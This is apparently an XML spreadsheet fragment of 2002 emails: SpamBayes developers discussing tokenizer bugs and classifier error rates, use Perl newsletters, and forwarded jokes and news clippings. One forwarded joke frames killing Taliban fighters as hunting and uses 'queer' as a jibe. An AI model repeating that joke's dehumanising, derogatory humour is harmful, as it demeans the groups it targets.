Content-type: text/html; charset=iso-8859-1
Content-transfer-encoding: 7BITHi there.
--snot--
------------------------------8&lt;------------------------------Comes out like this:------------------------------8&lt;------------------------------
From: somebody 
To: neale@woozle.org
Subject: Booga
Content-type: multipart/alternative; boundary="snot"
X-Hammie-Disposition: No; 0.74; [unrelated gar removed]This is a multi-part message in MIME format.--snot--snot--
------------------------------8&lt;------------------------------I'm using "Python 2.3a0 (#1, Sep  9 2002, 22:56:24)".I've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reality.In any case, be advised that (at least for me) hammie will eat
multipart/alternative messages until this patch is applied.  The patch
seems rather bogus though, so I'm not checking it in, in the hope that
there's a better fix I just wasn't capable of discovering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
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Neale Pickett  is all like:&gt; Maybe there's some subtle interaction between generators and lists
&gt; that I can't understand.  Or something.  Being as I'm baffled, I don't
&gt; imagine any theory I come up with will be anywhere close to reality.And then, just as I was about to fall asleep, I figured it out.  The
tokenizer now has an extra [:], and all is well.  I feel like a real
chawbacon for not realizing this earlier.  :*)Blaming it on staying up past bedtime,Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">On 10 September 2002, Tim Peters said:
&gt; Why would spam be likely to end up with two instances of Return-Path
&gt; in the headers?Possibly another qmail-ism from Bruce Guenter's spam collection.  Or
maybe Anthony's right about spammers being stupid and blindly copying
headers.  (Well, of course he's right about spammers being stupid; it's
just this particular aspect of stupidity that's open to question.)        Greg
-- 
Greg Ward                          http://www.gerg.ca/
Think honk if you're a telepath.
</t>
  </si>
  <si>
    <t>[Anthony Baxter]
&gt; 5 sets, each of 1800ham/1550spam, just ran the once (it matched all 5 to
&gt; each other...)
&gt;
&gt; rates.py sez:
&gt;
&gt; Training on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 1798 hams &amp; 1548 spams
&gt;       0.445   0.388
&gt;       0.445   0.323
&gt;       2.108   4.072
&gt;       0.556   1.097
&gt; Training on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 1798 hams &amp; 1546 spams
&gt;       2.113   0.517
&gt;       1.335   0.194
&gt;       3.106   5.365
&gt;       2.113   2.903
&gt; Training on Data/Ham/Set3 &amp; Data/Spam/Set3 ... 1798 hams &amp; 1547 spams
&gt;       2.447   0.646
&gt;       0.945   0.388
&gt;       2.884   3.426
&gt;       2.058   1.097
&gt; Training on Data/Ham/Set4 &amp; Data/Spam/Set4 ... 1803 hams &amp; 1547 spams
&gt;       1.057   2.584
&gt;       0.723   1.682
&gt;       0.890   1.164
&gt;       0.445   0.452
&gt; Training on Data/Ham/Set5 &amp; Data/Spam/Set5 ... 1798 hams &amp; 1550 spams
&gt;       0.779   4.328
&gt;       0.501   3.299
&gt;       0.667   3.361
&gt;       0.388   4.977
&gt; total false pos 273 3.03501945525
&gt; total false neg 367 4.74282760403How were these msgs broken up into the 5 sets?  Set4 in particular is giving
the other sets severe problems, and Set5 blows the f-n rate on everything
it's predicting -- when the rates across runs within a training set vary by
as much as a factor of 25, it suggests there was systematic bias in the way
the sets were chosen.  For example, perhaps they were broken into sets by
arrival time.  If that's what you did, you should go back and break them
into sets randomly instead.  If you did partition them randomly, the wild
variance across runs is mondo mysterious.
&gt;&gt; I expect hammie will do a much better job on this already than hand
&gt;&gt; grepping.  Be sure to stare at the false positives and get the
&gt;&gt; spam out of there.&gt; Yah, but there's a chicken-and-egg problem there - I want stuff that's
&gt; _known_ to be right to test this stuff,Then you have to look at every message by eyeball -- any scheme has non-zero
error rates of both kinds.&gt; so using the spambayes code to tell me whether it's spam is not
&gt; going to help.Trust me  -- it helps a *lot*.  I expect everyone who has done any
testing here has discovered spam in their ham, and vice versa.  Results
improve as you improve the categorization.  Once the gross mistakes are
straightened out, it's much less tedious to scan the rest by eyeball.[on skip tokens]
&gt; Yep, it shows up in a lot of spam, but also in different forms in hams.
&gt; But the hams each manage to pick a different variant of
&gt; ~~~~~~~~~~~~~~~~~~~~~~
&gt; or whatever - so they don't end up counteracting the various bits in the
&gt; spam.
&gt;
&gt; Looking further, a _lot_ of the bad skip rubbish is coming from
&gt; uuencoded viruses &amp;c in the spam-set.For whatever reason, there appear to be few of those in BruceG's spam
collection.  I added code to strip uuencoded sections, and pump out uuencode
summary tokens instead.  I'll check it in.  It didn't make a significant
difference on my usual test run (a single spam in my Set4 is now judged as
ham by the other 4 sets; nothing else changed).  It does shrink the database
size here by a few percent.  Let us know whether it helps you!Before and after stripping uuencoded sections:false positive percentages
    0.000  0.000  tied
    0.000  0.000  tied
    0.050  0.050  tied
    0.000  0.000  tied
    0.025  0.025  tied
    0.000  0.000  tied
    0.075  0.075  tied
    0.025  0.025  tied
    0.025  0.025  tied
    0.000  0.000  tied
    0.050  0.050  tied
    0.000  0.000  tied
    0.025  0.025  tied
    0.000  0.000  tied
    0.000  0.000  tied
    0.050  0.050  tied
    0.025  0.025  tied
    0.000  0.000  tied
    0.025  0.025  tied
    0.050  0.050  tiedwon   0 times
tied 20 times
lost  0 timestotal unique fp went from 8 to 8 tiedfalse negative percentages
    0.255  0.255  tied
    0.364  0.364  tied
    0.254  0.291  lost   +14.57%
    0.509  0.509  tied
    0.436  0.436  tied
    0.218  0.218  tied
    0.182  0.218  lost   +19.78%
    0.582  0.582  tied
    0.327  0.327  tied
    0.255  0.255  tied
    0.254  0.291  lost   +14.57%
    0.582  0.582  tied
    0.545  0.545  tied
    0.255  0.255  tied
    0.291  0.291  tied
    0.400  0.400  tied
    0.291  0.291  tied
    0.218  0.218  tied
    0.218  0.218  tied
    0.145  0.182  lost   +25.52%won   0 times
tied 16 times
lost  4 timestotal unique fn went from 89 to 90 lost    +1.12%</t>
  </si>
  <si>
    <t>&gt;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you!I'll give it a go.
-- 
Anthony Baxter        
It's never too late to have a happy childhood.</t>
  </si>
  <si>
    <t xml:space="preserve">[Neale Pickett]
&gt; And then, just as I was about to fall asleep, I figured it out.  The
&gt; tokenizer now has an extra [:], and all is well.  I feel like a real
&gt; chawbacon for not realizing this earlier.  :*)Good eye, Neale!  Thanks for the fix.&gt; Blaming it on staying up past bedtime,Blame it on Barry.  I do .
</t>
  </si>
  <si>
    <t>[Tim]
&gt;&gt; Why would spam be likely to end up with two instances of Return-Path
&gt;&gt; in the headers?[Greg Ward]
&gt; Possibly another qmail-ism from Bruce Guenter's spam collection.Doesn't seem *likely*, as it appeared in about 900 of about 14,000 spams.
It could be specific to one of his bait addresses, though -- don't know.  A
nice thing about a statistical inferencer is that you really don't have to
know why a thing works, just whether it works .&gt; Or maybe Anthony's right about spammers being stupid and blindly copying
&gt; headers. (Well, of course he's right about spammers being stupid; it's
&gt; just this particular aspect of stupidity that's open to question.)I'm going to blow it off -- it's just another instance of being pointlessly
baffled by a mixed corpus half of which I don't know enough about.</t>
  </si>
  <si>
    <t xml:space="preserve">
    Anthony&gt; They weren't partitioned in any particular scheme - I think
    Anthony&gt; I'll write a reshuffler and move them all around, ...Hmmm.   How about you create empty Data/Ham/Set[12345], stuff all your
files into a Data/Ham/reservoir folder, then run the rebal.py script to
randomly parcel messages out to the various real directories?I suspect you can pull the same stunt for your Data/Spam stuff.Skip
</t>
  </si>
  <si>
    <t>[Skip]
&gt; Hmmm.   How about you create empty Data/Ham/Set[12345], stuff all your
&gt; files into a Data/Ham/reservoir folder, then run the rebal.py script to
&gt; randomly parcel messages out to the various real directories?I'm afraid rebal is quadratic-time in the # of msgs it shuffles around --
since it was only intended to move a few files around, it's dead simple.An easy thing is to start the same way:  move all the files into a single
directory.  Then do random.shuffle() on an os.listdir() of that directory.
Then it's trivial to split the result into N slices, and move the files into
N other directories accordingly.&gt; I suspect you can pull the same stunt for your Data/Spam stuff.Yup!</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; They weren't partitioned in any particular scheme - I think I'll write a
&gt; reshuffler and move them all around, just in case (fwiw, I'm using MH 
&gt; style folders with numbered files - means you can just use MH tools to 
&gt; manipulate the sets.)Freak show. Obviously there _was_ some sort of patterns to the data:Training on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 1798 hams &amp; 1546 spams
      0.779   0.582
      0.834   0.840
      0.945   0.452
      0.667   1.164
Training on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 1798 hams &amp; 1547 spams
      1.112   0.776
      0.834   0.969
      0.779   0.646
      0.667   1.100
Training on Data/Ham/Set3 &amp; Data/Spam/Set3 ... 1798 hams &amp; 1548 spams
      1.168   0.582
      1.001   0.646
      0.834   0.582
      0.667   0.453
Training on Data/Ham/Set4 &amp; Data/Spam/Set4 ... 1798 hams &amp; 1547 spams
      0.779   0.712
      0.779   0.582
      0.556   0.840
      0.779   0.970
Training on Data/Ham/Set5 &amp; Data/Spam/Set5 ... 1798 hams &amp; 1546 spams
      0.612   0.517
      0.779   0.517
      0.723   0.711
      0.667   0.582
total false pos 144 1.60177975528
total false neg 101 1.30592190328(before the shuffle, I was seeing:
total false pos 273 3.03501945525
total false neg 367 4.74282760403
)For sake of comparision, here's what I see for partitioned into 2 sets:Training on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 4492 hams &amp; 3872 spams
      0.490   0.776
Training on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 4493 hams &amp; 3868 spams
      0.401   0.491
total false pos 40 0.445186421814
total false neg 49 0.633074935401more later...Anthony
</t>
  </si>
  <si>
    <t>use Perl Daily Headline MailerDamian Conway Publishes Exegesis 5
    posted by hfb on Friday August 23, @14:06 (perl6)
    http://use.perl.org/article.pl?sid=02/08/23/1872262nd Open Source CMS Conference
    posted by ziggy on Friday August 23, @18:30 (events)
    http://use.perl.org/article.pl?sid=02/08/23/1837242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</si>
  <si>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Damian Conway Publishes Exegesis 5
    * 2nd Open Source CMS Conference+--------------------------------------------------------------------+
| Damian Conway Publishes Exegesis 5                                 |
|   posted by hfb on Friday August 23, @14:06 (perl6)                |
|   http://use.perl.org/article.pl?sid=02/08/23/187226               |
+--------------------------------------------------------------------+An anonymous coward writes "[0]/. has a [1]link to [2]Damian's
[3]Exegesis 5"Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/23/187226Links:
    0. http://www.slashdot.org/
    1. http://developers.slashdot.org/developers/02/08/23/1232230.shtml?tid=145
    2. http://yetanother.org/damian/
    3. http://www.perl.com/lpt/a/2002/08/22/exegesis5.html
+--------------------------------------------------------------------+
| 2nd Open Source CMS Conference                                     |
|   posted by ziggy on Friday August 23, @18:30 (events)             |
|   http://use.perl.org/article.pl?sid=02/08/23/1837242              |
+--------------------------------------------------------------------+[0]Gregor J. Rothfuss writes "There will be a second [1]Open Source CMS
conference this fall in Berkeley. We will feature presentations and
workshops from a wide range of CMS, and would definitely welcome some
Perl-fu in there as well. Also of interest, our efforts to [2]build
bridges across CMS. Participate in our [3]mailing list, or better yet,
[4]show up :)" The [5]first Open Source CMS conference was held in Zurich
this past March.Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/23/1837242Links:
    0. mailto:gregor.rothfuss@oscom.org
    1. http://www.oscom.org/conferences/berkeley2002/index.html
    2. http://www.oscom.org/interop.html
    3. http://www.oscom.org/mailing-lists.html
    4. http://www.oscom.org/conferences/berkeley2002/registration_fees.html
    5. http://www.oscom.org/conferences/zurich2002/agenda.htmlCopyright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</si>
  <si>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
Forwarded-by: Rob Windsor 
Forwarded-by: "David Dietz" The latest proposal to drive the Taliban and Al Qaeda out of the
Mountains of Afghanistan is to send in the ASF (Alabama Special
Forces) Billy Bob, Bubba, Boo, Scooter, Cooter and Junior are being
sent in with the following information about the Taliban:1. There is no limit.
2. The season opened last weekend.
3. They taste just like chicken.
4. They hate beer, pickup trucks, country music, and Jesus.
5. Some are queer.
6. They don't like barbecue.And most importantly...7. They were responsible for Dale Earnhardt's death.We estimate it should be over in just about two days.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Rob Windsor 
Forwarded-by: "Dave Bruce" 
Forwarded by: Gary Williams A Mother had 3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&amp; Hedges".  Mom now knew to go straight to 
her husband's cigarettes, and she read from the Benson &amp;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Harper's Bazaar magazine, flipped through the pages fearing the worst, 
and finally found the ad for the airline.  The ad said: "Three times a 
day, seven days a week, both ways." Mom fainted. 
</t>
  </si>
  <si>
    <t>use Perl Daily NewsletterIn this issue:
    * This Week on perl5-porters (19-25 August 2002)
    * Slashdot Taking Questions to Ask Larry Wall+--------------------------------------------------------------------+
| This Week on perl5-porters (19-25 August 2002)                     |
|   posted by rafael on Monday August 26, @07:42 (summaries)         |
|   http://use.perl.org/article.pl?sid=02/08/26/1154225              |
+--------------------------------------------------------------------+I guess those thunderstorms came. And how they came. From an even wetter
than normal country on the shores of the North Sea, comes this weeks
perl5-porters summary.This story continues at:
    http://use.perl.org/article.pl?sid=02/08/26/1154225Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/26/1154225
+--------------------------------------------------------------------+
| Slashdot Taking Questions to Ask Larry Wall                        |
|   posted by pudge on Monday August 26, @14:41 (perl6)              |
|   http://use.perl.org/article.pl?sid=02/08/26/1845224              |
+--------------------------------------------------------------------+Please, if you feel inclined, make sure some [0]reasonable questions are
asked of him.Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/26/1845224Links:
    0. http://interviews.slashdot.org/article.pl?sid=02/08/25/236217&amp;tid=145Copyright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</si>
  <si>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MailerThis Week on perl5-porters (19-25 August 2002)
    posted by rafael on Monday August 26, @07:42 (summaries)
    http://use.perl.org/article.pl?sid=02/08/26/1154225Slashdot Taking Questions to Ask Larry Wall
    posted by pudge on Monday August 26, @14:41 (perl6)
    http://use.perl.org/article.pl?sid=02/08/26/1845224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</si>
  <si>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
Forwarded-by: Per Hammer http://news.bbc.co.uk/1/hi/world/asia-pacific/2218715.stmBrothel duty for Australian MPA conservative Member of Parliament in Australia is set to 
spend the day as a "slave" at one of Western Australia's most 
notorious brothels. Liberal Party member Barry Haase was "won" in a charity auction 
after the madam of Langtree's brothel in the mining town of 
Kalgoorlie made the highest offer for his services for a day. [...]"I hope he will leave with an informed decision on what 
Australian brothels are all about and it will help him in his 
political career to make informed decisions that he might not 
have been able to make before," Ms Kenworthy said. Mr Haase, a member of Prime Minister John Howard's party 
seemed relaxed about the prospect of working in a brothel. "You can't be half-hearted about fundraising for significant 
charities and I think I'm big enough to play the game," he said. 
</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer.NET and Perl, Working Together
    posted by pudge on Tuesday August 27, @09:17 (links)
    http://use.perl.org/article.pl?sid=02/08/27/1317253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</si>
  <si>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.NET and Perl, Working Together+--------------------------------------------------------------------+
| .NET and Perl, Working Together                                    |
|   posted by pudge on Tuesday August 27, @09:17 (links)             |
|   http://use.perl.org/article.pl?sid=02/08/27/1317253              |
+--------------------------------------------------------------------+[0]jonasbn writes "DevX has brought an article on the subject of [1]Perl
and .NET and porting existing code. The teaser: Learn how CPAN Perl
modules can be made automatically available to the .NET framework. The
technique involves providing small PerlNET mediators between Perl and
.NET and knowing when, where, and how to modify."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/27/1317253Links:
    0. mailto:jonasbn@io.dk
    1. http://www.devx.com/dotnet/articles/ym81502/ym81502-1.aspCopyright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</si>
  <si>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MailerTwo OSCON Lightning Talks Online
    posted by gnat on Friday August 30, @18:37 (news)
    http://use.perl.org/article.pl?sid=02/08/30/2238234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</si>
  <si>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Two OSCON Lightning Talks Online+--------------------------------------------------------------------+
| Two OSCON Lightning Talks Online                                   |
|   posted by gnat on Friday August 30, @18:37 (news)                |
|   http://use.perl.org/article.pl?sid=02/08/30/2238234              |
+--------------------------------------------------------------------+[0]gnat writes "The first two OSCON 2002 lightning talks are available
from [1]the perl.org website. They are Dan Brian on "What Sucks and What
Rocks" (in [2]QuickTime and [3]mp3), and Brian Ingerson on "Your Own
Personal Hashbang" (in [4]QuickTime and [5]mp3). Enjoy!"This story continues at:
    http://use.perl.org/article.pl?sid=02/08/30/2238234Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/30/2238234Links:
    0. mailto:gnat@frii.com
    1. http://www.perl.org/tpc/2002/
    2. http://www.perl.org/tpc/2002/movies/lt-1/
    3. http://www.perl.org/tpc/2002/audio/lt-1/
    4. http://www.perl.org/tpc/2002/movies/lt-2/
    5. http://www.perl.org/tpc/2002/audio/lt-2/Copyright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</si>
  <si>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MailerPerl Ports Page
    posted by hfb on Saturday August 31, @13:40 (cpan)
    http://use.perl.org/article.pl?sid=02/08/31/1744247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</si>
  <si>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Perl Ports Page+--------------------------------------------------------------------+
| Perl Ports Page                                                    |
|   posted by hfb on Saturday August 31, @13:40 (cpan)               |
|   http://use.perl.org/article.pl?sid=02/08/31/1744247              |
+--------------------------------------------------------------------+[0]jhi writes " One of the largely unknown services of CPAN is the
[1]Ports page, which offers links to ready-packaged binary distributions
of Perl for various platforms, and also other related links (to other
UNIXy software, if the platform isn't, and to IDEs and editors). I would
like to get feedback on the ports page either here or by sending email to
cpan@perl.org. Any kind of feedback is welcome, but I will feel free to
ignore any I don't like :-)"Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/31/1744247Links:
    0. mailto:jhi@iki.fi
    1. http://www.cpan.org/ports/Copyright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</si>
  <si>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This Week on perl5-porters (26 August / 1st September 2002)
    * The Perl Review, v0 i5+--------------------------------------------------------------------+
| This Week on perl5-porters (26 August / 1st September 2002)        |
|   posted by rafael on Monday September 02, @03:47 (summaries)      |
|   http://use.perl.org/article.pl?sid=02/09/02/0755208              |
+--------------------------------------------------------------------+This week, we're back to our regularly scheduled p5p report, straight
from my keyboard's mouth. Many thanks to Elizabeth Mattjisen who provided
the two previous reports, while I was away from p5p and from whatever
might evocate more or less a computer.This story continues at:
    http://use.perl.org/article.pl?sid=02/09/02/0755208Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/02/0755208
+--------------------------------------------------------------------+
| The Perl Review, v0 i5                                             |
|   posted by ziggy on Monday September 02, @14:20 (news)            |
|   http://use.perl.org/article.pl?sid=02/09/02/1823229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Enjoy!"Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/02/1823229Links:
    0. http://www.theperlreview.com
    1. http://www.theperlreview.com/Copyright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</si>
  <si>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MailerThis Week on perl5-porters (26 August / 1st September 2002)
    posted by rafael on Monday September 02, @03:47 (summaries)
    http://use.perl.org/article.pl?sid=02/09/02/0755208The Perl Review, v0 i5
    posted by ziggy on Monday September 02, @14:20 (news)
    http://use.perl.org/article.pl?sid=02/09/02/1823229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</si>
  <si>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MailerPerl CMS Systems
    posted by ziggy on Tuesday September 03, @05:00 (tools)
    http://use.perl.org/article.pl?sid=02/09/02/18272391998 Perl Conference CD Online
    posted by gnat on Tuesday September 03, @19:34 (news)
    http://use.perl.org/article.pl?sid=02/09/03/2334251Bricolage 1.4.0 Escapes!
    posted by chip on Tuesday September 03, @19:57 (tools)
    http://use.perl.org/article.pl?sid=02/09/04/002204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</si>
  <si>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Perl CMS Systems
    * 1998 Perl Conference CD Online
    * Bricolage 1.4.0 Escapes!+--------------------------------------------------------------------+
| Perl CMS Systems                                                   |
|   posted by ziggy on Tuesday September 03, @05:00 (tools)          |
|   http://use.perl.org/article.pl?sid=02/09/02/1827239              |
+--------------------------------------------------------------------+KLB writes "[0]Krow, one of the authors of [1]Slash, has written up a
[2]review on [3]Linux.com of two other Perl CMS systems, the E2 and LJ
engines. Makes for interesting reading."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/02/1827239Links:
    0. http://krow.net/~
    1. http://slashcode.com/
    2. http://newsforge.com/article.pl?sid=02/08/28/0013255&amp;mode=thread&amp;tid=49
    3. http://linux.com/
+--------------------------------------------------------------------+
| 1998 Perl Conference CD Online                                     |
|   posted by gnat on Tuesday September 03, @19:34 (news)            |
|   http://use.perl.org/article.pl?sid=02/09/03/2334251              |
+--------------------------------------------------------------------+[0]gnat writes "[1]The 1998 Perl Conference CD is online on perl.org.
Enjoy the blast from the past (was [2]this Damian's first public
appearance?)" (thanks to Daniel Berger for packratting the CD!)Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/03/2334251Links:
    0. mailto:gnat@oreilly.com
    1. http://www.perl.org/tpc/1998/
    2. http://www.perl.org/tpc/1998/User_Applications/Declarative%20Command-line%20Inter/
+--------------------------------------------------------------------+
| Bricolage 1.4.0 Escapes!                                           |
|   posted by chip on Tuesday September 03, @19:57 (tools)           |
|   http://use.perl.org/article.pl?sid=02/09/04/002204               |
+--------------------------------------------------------------------+[0]Theory writes "Bricolage 1.4.0 has finally escaped the shackles of its
CVS repository! ... Bricolage is a full-featured, enterprise-class
content management and publishing system. It offers a browser-based
interface for ease-of use, a full-fledged templating system with complete
programming language support for flexibility, and many other features
(see below). It operates in an Apache/mod_perl environment, and uses the
PostgreSQL RDBMS for its repository."This story continues at:
    http://use.perl.org/article.pl?sid=02/09/04/002204Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/04/002204Links:
    0. http://bricolage.cc/Copyright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</si>
  <si>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Headline MailerPerl "Meetup"
    posted by ziggy on Thursday September 05, @19:12 (news)
    http://use.perl.org/article.pl?sid=02/09/05/2316234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</si>
  <si>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use Perl Daily NewsletterIn this issue:
    * Perl "Meetup"+--------------------------------------------------------------------+
| Perl "Meetup"                                                      |
|   posted by ziggy on Thursday September 05, @19:12 (news)          |
|   http://use.perl.org/article.pl?sid=02/09/05/2316234              |
+--------------------------------------------------------------------+[0]davorg writes "The people at [1]Meetup have set up a [2]Perl Meetup.
The first one takes place on September 19th. I'll probably go along to
the one in London to see what happens, but I'd be very interested in
hearing any opinions on what this achieves that the existing Perl Mongers
groups don't."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/05/2316234Links:
    0. mailto:dave@dave.org.uk
    1. http://www.meetup.com/
    2. http://perl.meetup.com/Copyright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</si>
  <si>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
Forwarded-by: Sven Guckes http://news.com.au/common/story_page/0,4057,5037762%255E13762,00.htmlPort San Luis, California
September 05, 2002A WHALE which suddenly breached and crashed into the bow of a
fishing boat killed a restaurant owner on board.Jerry Tibbs, 51, of Bakersfield, California, was aboard his boat,
The BBQ, when the whale hit and tossed him into the sea five miles
off Port San Luis.Three other fishermen stayed aboard the damaged boat, which was
towed to shore by the US Coast Guard.Tibbs and his three friends were just ending a day fishing for
albacore when the accident occurred, authorities said.Tibbs' body was found after a search lasting more than 18 hours
Coast Guard officials said it was the first time they could recall
an accident caused by a whale hitting a boat.
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerThis Week on perl5-porters (2-8 September 2002)
    posted by rafael on Monday September 09, @07:33 (summaries)
    http://use.perl.org/article.pl?sid=02/09/09/1147243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</si>
  <si>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This Week on perl5-porters (2-8 September 2002)+--------------------------------------------------------------------+
| This Week on perl5-porters (2-8 September 2002)                    |
|   posted by rafael on Monday September 09, @07:33 (summaries)      |
|   http://use.perl.org/article.pl?sid=02/09/09/1147243              |
+--------------------------------------------------------------------+As September begins, the perl5-porters, ignoring the changing weather,
continue to work. This week, some small things, and a few bigger ones,
are selected in the report. Read below.This story continues at:
    http://use.perl.org/article.pl?sid=02/09/09/1147243Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/09/1147243Copyright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</si>
  <si>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MailerDynDNS.org Offers Free DNS To Perl Sites
    posted by KM on Tuesday September 10, @08:23 (news)
    http://use.perl.org/article.pl?sid=02/09/10/1225228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</si>
  <si>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DynDNS.org Offers Free DNS To Perl Sites+--------------------------------------------------------------------+
| DynDNS.org Offers Free DNS To Perl Sites                           |
|   posted by KM on Tuesday September 10, @08:23 (news)              |
|   http://use.perl.org/article.pl?sid=02/09/10/1225228              |
+--------------------------------------------------------------------+[0]krellis writes "[0]DynDNS.org today [1]announced that it will provide
free premium DNS services (primary and secondary DNS hosting) to any
domains involved in the Perl Community. Read the press release for full
details, [2]create an account, and [3]request credit under the Perl DNS
offer! Never lose traffic to your Perl site due to failed DNS again!"
Sweet. Thanks.Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/10/1225228Links:
    0. http://www.dyndns.org/
    1. http://www.dyndns.org/news/2002/perl-dns.php
    2. https://members.dyndns.org/policy.shtml
    3. https://members.dyndns.org/nic/perlCopyright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</si>
  <si>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MailerThe Perl Journal Returns Online
    posted by pudge on Wednesday September 11, @21:59 (links)
    http://use.perl.org/article.pl?sid=02/09/12/026254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</si>
  <si>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The Perl Journal Returns Online+--------------------------------------------------------------------+
| The Perl Journal Returns Online                                    |
|   posted by pudge on Wednesday September 11, @21:59 (links)        |
|   http://use.perl.org/article.pl?sid=02/09/12/026254               |
+--------------------------------------------------------------------+CMP, owners of [0]The Perl Journal, have brought the journal back, in the
form of an online monthly magazine, in PDF form. The subscription rate is
$12 a year. They need 3,000 subscriptions to move forward (no word if
existing subscriptions will be honored, or included in the 3,000).
[0]Read the site for more details.I think some of the more interesting notes are that it will include "a
healthy dose of opinion", as well a broadening of coverage including
languages other than Perl (will this mean a name change?) and platforms
other than Unix (I'd always thought one of TPJ's strengths was that it
covered a wide variety of platforms).Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/12/026254Links:
    0. http://www.tpj.com/Copyright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</si>
  <si>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Mailer"Perl 6: Right Here, Right Now" slides ava
    posted by gnat on Friday September 13, @12:01 (news)
    http://use.perl.org/article.pl?sid=02/09/13/162209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</si>
  <si>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"Perl 6: Right Here, Right Now" slides ava+--------------------------------------------------------------------+
| "Perl 6: Right Here, Right Now" slides ava                         |
|   posted by gnat on Friday September 13, @12:01 (news)             |
|   http://use.perl.org/article.pl?sid=02/09/13/162209               |
+--------------------------------------------------------------------+[0]gnat writes "The wonderful Leon Brocard has released the slides from
his lightning talk to the London perlmongers, [1]Perl 6: Right Here,
Right Now, showing the current perl6 compiler in action."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/13/162209Links:
    0. mailto:gnat@oreilly.com
    1. http://astray.com/perl6_now/Copyright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</si>
  <si>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MailerNew Perl Mongers Web Site
    posted by KM on Monday September 16, @08:41 (groups)
    http://use.perl.org/article.pl?sid=02/09/16/1243234Java vs. Perl
    posted by pudge on Monday September 16, @11:15 (java)
    http://use.perl.org/article.pl?sid=02/09/16/1448246This Week on perl5-porters (9-15 September 2002)
    posted by rafael on Monday September 16, @16:17 (summaries)
    http://use.perl.org/article.pl?sid=02/09/16/2026255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</si>
  <si>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New Perl Mongers Web Site
    * Java vs. Perl
    * This Week on perl5-porters (9-15 September 2002)+--------------------------------------------------------------------+
| New Perl Mongers Web Site                                          |
|   posted by KM on Monday September 16, @08:41 (groups)             |
|   http://use.perl.org/article.pl?sid=02/09/16/1243234              |
+--------------------------------------------------------------------+[0]davorg writes "Leon Brocard has been working hard to update the
[1]Perl Mongers web site. We're still going thru the process of cleaning
up the data about the Perl Monger groups, so if you see something that
isn't quite right then please [2]let us know."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/16/1243234Links:
    0. mailto:dave@dave.org.uk
    1. http://www.pm.org/
    2. mailto:user_groups@pm.org
+--------------------------------------------------------------------+
| Java vs. Perl                                                      |
|   posted by pudge on Monday September 16, @11:15 (java)            |
|   http://use.perl.org/article.pl?sid=02/09/16/1448246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with."This story continues at:
    http://use.perl.org/article.pl?sid=02/09/16/1448246Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/16/1448246Links:
    0. mailto:dave@dave.org.uk
    1. http://developer.java.sun.com/developer/qow/archive/184/index.jsp
+--------------------------------------------------------------------+
| This Week on perl5-porters (9-15 September 2002)                   |
|   posted by rafael on Monday September 16, @16:17 (summaries)      |
|   http://use.perl.org/article.pl?sid=02/09/16/2026255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alii.This story continues at:
    http://use.perl.org/article.pl?sid=02/09/16/2026255Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/16/2026255Copyright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</si>
  <si>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Forwarded-by: Nev Dull 
Forwarded-by: newsletter@tvspy.com
Excerpted: ShopTalk - September 13, 2002"I'm a tad furry, so animal rights issues come into play."
	Robin Williams, telling Entertainment Weekly why he won't do
	nude scenes in movies.=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Johnny U: Johnny Unitas was the National Football League's most valuable
player twice - and he led Baltimore to victory in "Super Bowl Five."
For those of you younger than 30: this WAS modern football.  The game
was played on artificial turf. (Richard Burkard/
http://www.Laughline.com)Announcement: How telling is it that the death of Johnny Unitas was
announced by the Baltimore Ravens - and not the Colts, who now play in
Indianapolis?  When the Colt owners moved out of Baltimore years ago,
they apparently left all the history books behind. (Burkard)Dick Disappears: Vice President Dick Cheney remains at an undisclosed
location.  The move is for security reasons.  The Bush Administration
is trying to keep him at a safe distance from would-be subpoenas. (Alan
Ray - http://www.araycomedy.com)Noelle Nabbed: Jeb Bush's daughter Noelle is in trouble with the law
again.  When she was a child, her dad would read her favorite bedtime
story.  Goldilocks and the Three Strikes. (Ray)
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerSubscribe to The Perl Review
    posted by pudge on Tuesday September 17, @08:00 (links)
    http://use.perl.org/article.pl?sid=02/09/17/121210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</si>
  <si>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Subscribe to The Perl Review+--------------------------------------------------------------------+
| Subscribe to The Perl Review                                       |
|   posted by pudge on Tuesday September 17, @08:00 (links)          |
|   http://use.perl.org/article.pl?sid=02/09/17/121210               |
+--------------------------------------------------------------------+[0]barryp writes "You can now pledge a subscription to [1]The Perl Review.
The plan is to produce four print magazines per year. Cost: $12/year
(US); $20/year (international). Let's all make this happen by signing
up!" The web site says that they'll attempt to go print if they get
enough subscription pledges.Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/17/121210Links:
    0. mailto:paul.barry@itcarlow.ie
    1. http://www.theperlreview.com/Copyright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</si>
  <si>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Forwarded-by: William Knowles http://www.thesun.co.uk/article/0,,2-2002430339,00.htmlBy PAUL CROSBIE
